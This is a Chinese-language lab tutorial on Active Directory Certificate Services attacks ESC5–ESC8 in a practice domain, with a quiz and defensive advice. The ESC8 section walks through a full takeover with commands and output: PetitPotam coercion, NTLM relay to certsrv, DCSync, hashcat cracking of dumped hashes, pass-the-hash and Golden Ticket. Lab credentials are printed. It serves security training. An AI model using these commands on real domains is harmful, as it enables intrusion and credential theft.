經過昨天學習 ESC1-4 的憑證模板弱點，今天要探討更進階的 ADCS 攻擊場景。ESC5-8 涉及 PKI 基礎設施的存取控制、CA 設定錯誤，以及結合 NTLM Relay 的攻擊手法。這些攻擊往往更難被發現，但影響範圍可能更廣泛。

今日實作目標

在完成今天的實作後，你將能夠：

1. 理解 PKI 物件階層 - 掌握 AD CS 在 Configuration 容器中的結構
2. 識別 ESC5 弱點 - PKI 物件的危險 ACL 設定
3. 理解 ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 旗標濫用
4. 識別 ESC7 弱點 - CA 權限提升
5. 實作 ESC8 - NTLM Relay 到 AD CS HTTP 端點

本次實作限制

• ESC5：需要特定權限設定，需要手動調整權限
• ESC6：需要管理員手動啟用旗標
• ESC7：需要 CA 管理權限

環境準備

# 確認工具安裝
which certipy-ad
which ntlmrelayx.py
which responder

# 檢查 AD CS HTTP 端點
curl -I http://192.168.139.23/certsrv/
curl -I http://192.168.139.10/certsrv/

從昨天取得 NTLM Hash

impacket-secretsdump -hashes ':54296a48cd30259cc88095373cec24da' \
    'essos.local/administrator@192.168.139.12'

[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a5df275f8f1573d10758b4de3ab8e53b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1114:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1116:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
missandei:1117:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
drogon:1118:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
newdomainadmin:1121:aad3b435b51404eeaad3b435b51404ee:d53c4afacf67e22e278f5da61744ea6e:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:4e93d0fe7ce92d988efb705da462b927:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:1dfc702c35f0e76a73a90dce3d8e8b5f:::
gmsaDragon$:1120:aad3b435b51404eeaad3b435b51404ee:fe6c2902a1d87c21072282361f494f7d:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:921ab9c08c40d51c38c1fff01a14956e:::

ESC5：PKI 物件存取控制弱點

理論基礎

ESC5 涉及 AD CS 基礎設施中各種物件的存取控制弱點，而非只是憑證模板。

PKI 物件層級結構：

CN=Configuration,DC=domain,DC=com
└── CN=Services
    └── CN=Public Key Services
        ├── CN=Certificate Templates    # 憑證模板容器
        ├── CN=Enrollment Services      # CA 註冊服務
        ├── CN=NTAuthCertificates      # 認證 CA
        └── CN=Certification Authorities # 根 CA

關鍵攻擊向量

1. CA 電腦物件控制
   • 透過 S4U2Self/S4U2Proxy 取得權限
   • RBCD (Resource-Based Constrained Delegation) 攻擊
2. PKI 容器物件寫入權限

   # 檢查 Public Key Services 容器權限
   Get-Acl "AD:CN=Public Key Services,CN=Services,CN=Configuration,DC=essos,DC=local"
   

3. NTAuthCertificates 物件控制
   • 可新增惡意 CA 憑證
   • 影響整個森林的信任

實作範例：濫用 Certificate Templates 容器權限

如果攻擊者對 Certificate Templates 容器有寫入權限：

#!/usr/bin/env python3
import ldap3
from ldap3 import Server, Connection, MODIFY_ADD

# 連接 LDAP
server = Server('192.168.139.12', use_ssl=False)
conn = Connection(server, 'essos.local\\khal.drogo', 'horse', 
                 authentication=ldap3.NTLM)
conn.bind()

# 假設有權限修改 Templates 容器
templates_dn = ('CN=Certificate Templates,CN=Public Key Services,'
                'CN=Services,CN=Configuration,DC=essos,DC=local')

# 嘗試新增惡意模板（需要適當權限）
# 實際攻擊中會建立包含 ESC1 弱點的新模板

ESC5 關鍵點

• 不是竊取 CA 私鑰（那是另一種攻擊）
• 是對 PKI 物件（如模板、NTAuthCertificates）的權限濫用
• 可以修改現有模板或新增惡意 CA

ESC6：EDITF_ATTRIBUTESUBJECTALTNAME2 設定錯誤

理論基礎

EDITF_ATTRIBUTESUBJECTALTNAME2 是 CA 層級的設定，允許在任何憑證請求中指定 SAN。

危險性：

• 繞過模板的 ENROLLEE_SUPPLIES_SUBJECT 限制
• 任何可申請憑證的使用者都能冒充他人
• 「讓它能運作」的快速修復往往造成安全漏洞

檢查 ESC6 弱點

# 方法 1：使用 Certipy
certipy find -u khal.drogo@essos.local -p 'horse' \
    -dc-ip 192.168.139.12 -stdout | grep -B5 -A5 "EDITF_ATTRIBUTESUBJECTALTNAME2"

# 方法 2：使用 certutil（需要適當權限）
certutil -config "braavos.essos.local\ESSOS-CA" -getreg "policy\EditFlags"

# 方法 3：直接查詢登錄（如果有權限）
reg query \\braavos\HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\ESSOS-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy /v EditFlags

利用 ESC6

如果 EDITF_ATTRIBUTESUBJECTALTNAME2 被啟用：

# 使用任何允許域認證的模板，指定替代身份
certipy req -u khal.drogo@essos.local -p 'horse' \
    -target braavos.essos.local \
    -template User \
    -ca ESSOS-CA \
    -upn administrator@essos.local \
    -dc-ip 192.168.139.12

注意差異：

• ESC1：需要特定模板設定允許 SAN
• ESC6：CA 層級設定，影響所有模板

修復 ESC6

# 停用危險旗標（需要 CA 管理員權限）
certutil -config "braavos.essos.local\ESSOS-CA" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

# 驗證變更
certutil -config "braavos.essos.local\ESSOS-CA" -getreg "policy\EditFlags"

ESC7：CA 存取控制弱點

理論基礎

CA 本身的權限設定可能允許低權限使用者執行管理操作。

關鍵權限：

• ManageCA - 可修改 CA 設定（包括啟用 ESC6）
• ManageCertificates - 可核准待審憑證
• Backup-Restore - 可備份 CA 私鑰

識別 ESC7

# 使用 Certipy 檢查 CA 權限
certipy find -u khal.drogo@essos.local -p 'horse' \
    -vulnerable -dc-ip 192.168.139.12 -stdout | grep -A30 "ESC7"

利用 ManageCA 權限

如果擁有 ManageCA 權限，可以啟用 EDITF_ATTRIBUTESUBJECTALTNAME2：

# 使用 PSPKI 模組
Import-Module PSPKI

# 取得 CA 物件
$CA = Get-CertificationAuthority -ComputerName braavos.essos.local

# 啟用危險旗標
Enable-PolicyModuleFlag -CA $CA -Flag "EDITF_ATTRIBUTESUBJECTALTNAME2"

# 現在可以執行 ESC6 攻擊

利用 ManageCertificates 權限

可以核准原本需要管理員審核的憑證：

# 1. 請求需要審核的憑證
certipy req -u khal.drogo@essos.local -p 'horse' \
    -target braavos.essos.local \
    -template ESC3 \
    -ca ESSOS-CA

# 記下 Request ID

# 2. 使用 PSPKI 核准（需要 ManageCertificates 權限）
# Approve-CertificateRequest -CA $CA -RequestID <ID>

ESC8：NTLM Relay 到 AD CS HTTP 端點

理論基礎

AD CS 的 HTTP 端點通常不啟用 NTLM 簽章或 EPA (Extended Protection for Authentication)，使其易受 NTLM Relay 攻擊。

易受攻擊的端點：

• /certsrv/ - Web Enrollment
• CES (Certificate Enrollment Service)
• CEP (Certificate Enrollment Policy)
• NDES (Network Device Enrollment Service)

環境準備

# 檢查 HTTP 端點
nmap -p 80,443 192.168.139.10-12,22-23 --open

# 確認 certsrv 可達性
curl http://192.168.139.23/certsrv/ -I

ESC8 完整攻擊步驟與結果

1. 發現 ESC8 弱點

# 確認 Web Enrollment 啟用
certipy find -u jon.snow@north.sevenkingdoms.local -p 'iknownothing' \
    -vulnerable -dc-ip 192.168.139.11 -stdout

# 輸出確認：
# Web Enrollment
#   HTTP
#     Enabled                         : True  ← ESC8 存在！
#   HTTPS
#     Enabled                         : False
# [!] Vulnerabilities
#   ESC8                              : Web Enrollment is enabled over HTTP.

2. 準備攻擊環境

# 建立工作目錄
mkdir ESC8
cd ESC8

# 啟動 NTLM Relay（Terminal 1）
ntlmrelayx.py -t http://192.168.139.10/certsrv/certfnsh.asp \
    -smb2support --adcs --template DomainController

# 輸出：
# [*] Servers started, waiting for connections

3. 觸發機器認證

git clone https://github.com/topotam/PetitPotam.git

# 使用 PetitPotam 觸發 DC 認證（Terminal 2）
python3 PetitPotam.py -u jon.snow -p 'iknownothing' \
    -d north.sevenkingdoms.local \
    192.168.139.136 192.168.139.11  # 攻擊者IP → 目標DC

# 輸出：
# [+] Got expected ERROR_BAD_NETPATH exception!!
# [+] Attack worked!

4. 成功取得憑證

# ntlmrelayx 輸出：
# [*] SMBD-Thread-5: Received connection from 192.168.139.11
# [*] Authenticating against http://192.168.139.10 as NORTH/WINTERFELL$ SUCCEED
# [*] Generating CSR...
# [*] CSR generated!
# [*] Getting certificate...
# [*] GOT CERTIFICATE! ID 8
# [*] Writing PKCS#12 certificate to ./WINTERFELL$.pfx
# [*] Certificate successfully written to file

ls
# 輸出：WINTERFELL$.pfx

5. 使用憑證認證

# 取得 TGT 和 NTLM hash
certipy auth -pfx 'WINTERFELL$.pfx' \
    -username 'winterfell$' \
    -domain 'north.sevenkingdoms.local' \
    -dc-ip 192.168.139.11

# 輸出：
# [*] Using principal: 'winterfell$@north.sevenkingdoms.local'
# [*] Trying to get TGT...
# [*] Got TGT
# [*] Saving credential cache to 'winterfell.ccache'
# [*] Got hash for 'winterfell$@north.sevenkingdoms.local': 
#     aad3b435b51404eeaad3b435b51404ee:1706805fc0ac487ec0e618a73371fde1

6. DCSync - 取得所有域內 Hash

impacket-secretsdump 'north.sevenkingdoms.local/winterfell$@winterfell.north.sevenkingdoms.local' \
    -hashes aad3b435b51404eeaad3b435b51404ee:1706805fc0ac487ec0e618a73371fde1

# 重要輸出：
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cc685e516100abe936fe151297f39dbc:::
# jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
# samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
# sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::

破解明文

cat > north_hashes_with_user.txt << EOF
Administrator:dbd13e1c4e338284ac4e9874f7de6ef4
krbtgt:cc685e516100abe936fe151297f39dbc
jon.snow:b8d76e56e9dac90539aff05e3ccb1755
samwell.tarly:f5db9e027ef824d029262068ac826843
sql_svc:84a5092f53390ea48d660be52b93b804
arya.stark:4f622f4cd4284a887228940e2ff4e709
eddard.stark:d977b98c6c9282c5c478be1d97b237b8
robb.stark:831486ac7f26860c9e2f51ac91e1a07a
brandon.stark:84bbaa1c58b7f69d2192560a3f932129
EOF

hashcat -m 1000 -a 0 north_hashes_with_user.txt /usr/share/wordlists/rockyou.txt --username

hashcat -m 1000 north_hashes_with_user.txt --show --username

jon.snow:b8d76e56e9dac90539aff05e3ccb1755:iknownothing
arya.stark:4f622f4cd4284a887228940e2ff4e709:Needle
robb.stark:831486ac7f26860c9e2f51ac91e1a07a:sexywolfy
brandon.stark:84bbaa1c58b7f69d2192560a3f932129:iseedeadpeople

攻擊影響分析

取得的權限

1. DC 機器帳號控制 - WINTERFELL$
2. 所有使用者 NTLM hash - 包含 Administrator
3. krbtgt hash - 可建立 Golden Ticket
4. 持久性存取 - 憑證有效期 1 年

可執行的後續攻擊

# 1. Pass-the-Hash 成為管理員
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 \
    Administrator@192.168.139.11

# 2. Golden Ticket 攻擊
impacket-ticketer -nthash cc685e516100abe936fe151297f39dbc \
    -domain-sid S-1-5-21-3099511005-1426058213-160971164 \
    -domain north.sevenkingdoms.local Administrator

# 3. 使用憑證持續存取（1年有效）
export KRB5CCNAME=winterfell.ccache
impacket-wmiexec -k -no-pass winterfell.north.sevenkingdoms.local

關鍵發現

1. ESC8 確實存在 - Web Enrollment over HTTP 沒有保護
2. DomainController 模板可被利用 - DC 可以申請此模板
3. 完整域控制 - 從低權限使用者到 Domain Admin
4. 多種持久性方法 - 憑證、Golden Ticket、Hash

防禦建議

1. 停用 HTTP Web Enrollment 或啟用 HTTPS + EPA
2. 限制憑證模板權限 - 只允許必要的群組
3. 監控憑證申請事件 - Event ID 4886, 4887
4. 實施 NTLM 簽章 - 防止 Relay 攻擊

ESC8 的威力

• 持久性：憑證有效期通常 1-2 年
• 繞過限制：不受 NTLM 簽章影響
• 廣泛影響：可攻擊任何有 Spooler 服務的機器

防禦策略

ESC5 防禦

# 審查 PKI 物件權限
Get-Acl "AD:CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" | 
    Select -ExpandProperty Access | 
    Where {$_.IdentityReference -like "*Domain Users*"}

# 限制權限到必要的管理群組

ESC6 防禦

# 停用所有 CA 的 EDITF_ATTRIBUTESUBJECTALTNAME2
foreach ($CA in Get-CertificationAuthority) {
    Disable-PolicyModuleFlag -CA $CA -Flag "EDITF_ATTRIBUTESUBJECTALTNAME2"
}

ESC7 防禦

# 限制 CA 權限
# 透過 certsrv.msc → 右鍵 CA → Properties → Security
# 只授予必要的管理群組 ManageCA 和 ManageCertificates

ESC8 防禦

# 1. 啟用 EPA (Extended Protection for Authentication)
# 在 IIS 管理員中為 certsrv 應用程式啟用

# 2. 停用 NTLM 
# 設定 GPO：Network security: Restrict NTLM

# 3. 使用 HTTPS 並要求憑證
# 4. 移除不必要的 HTTP 端點

監控與偵測

關鍵事件 ID

偵測腳本

# 監控 EDITF_ATTRIBUTESUBJECTALTNAME2 變更
$CAs = Get-CertificationAuthority
foreach ($CA in $CAs) {
    $EditFlags = Get-PolicyModuleFlag -CA $CA
    if ($EditFlags -contains "EDITF_ATTRIBUTESUBJECTALTNAME2") {
        Write-Warning "危險！$($CA.Name) 啟用了 EDITF_ATTRIBUTESUBJECTALTNAME2"
    }
}

小試身手

1) 關於 ESC6，下列何者正確？

A. 在特定憑證模板上啟用 ENROLLEE_SUPPLIES_SUBJECT 就是 ESC6
B. 在 CA 上啟用 EDITF_ATTRIBUTESUBJECTALTNAME2，使任何請求都可自行指定 SAN
C. 在 AD 內對 NTAuthCertificates 物件寫入權限
D. 使用 NTLM Relay 攻擊 /certsrv/ 端點

答案：B
解析： ESC6 是 CA 層級的設定漏洞（EDITF_ATTRIBUTESUBJECTALTNAME2），會讓申請者在任意模板的請求中帶入自訂 SAN，繞過模板本身的限制。A 是模板層級（接近 ESC1），C 是 ESC5 範疇，D 是 ESC8。

2) 在示範的 ESC8 流程中，成功取得 DC 憑證的正確組合是？

A. 只開 Responder 等待中毒
B. PetitPotam 觸發機器認證 + ntlmrelayx.py --adcs -t http://目標/certsrv/certfnsh.asp -–template DomainController
C. Kerberoasting 取得 TGS 後用 hash 要憑證
D. 先 DCSync 再用憑證登入

答案：B
解析： ESC8 典型做法是先強制目標機器對你認證（如 PetitPotam/PrinterBug/Spooler 類），再把這段 NTLM 交握轉接到 AD CS Web Enrollment（/certsrv/…），由 ntlmrelayx 自動送出憑證請求（常用 DomainController 模板）。

3) 下列哪一個 PKI 物件若被攻擊者取得寫入權限，影響範圍最大、甚至擴及整個森林？

A. CN=Certificate Templates
B. CN=Enrollment Services
C. CN=NTAuthCertificates
D. CN=Certification Authorities

答案：C
解析： NTAuthCertificates 儲存受信任的企業 CA 憑證，能被用來植入惡意/不被授權的 CA，造成整個森林的信任鍊汙染。A/D 也很關鍵，但 C 的衝擊一般視為最大。

4) 關於 ESC7 涉及的 CA 權限敘述，何者正確？

A. ManageCA 用於核准待審憑證；ManageCertificates 用於修改 CA 設定
B. ManageCA 可變更 CA 設定（例如啟用 EDITF_ATTRIBUTESUBJECTALTNAME2）；ManageCertificates 可核准待審憑證
C. ManageCA 與 ManageCertificates 僅能備份 CA 私鑰
D. 兩者都只能讀取不可修改

答案：B
解析： 在 ESC7，ManageCA 能改 CA 組態（間接導致 ESC6 風險），ManageCertificates 能核准原本需人工審核的請求；另外備份/還原私鑰屬於 Backup/Restore 相關權限。

5) 關於文中的 secretsdump 用法，下列哪個雜湊參數格式最恰當（僅有 NT Hash 時）？

A. -hashes <NT>
B. -hashes <NT>:
C. -hashes aad3b435b51404eeaad3b435b51404ee:<NT>
D. 不需 -hashes，直接把 NT 當密碼

答案：C
解析： Impacket 的 -hashes 參數採 LM:NT 格式。當沒有 LM Hash 時，慣例用 aad3b435b51404eeaad3b435b51404ee 作為 LM 佔位值，因此應填成 aad3…:NT。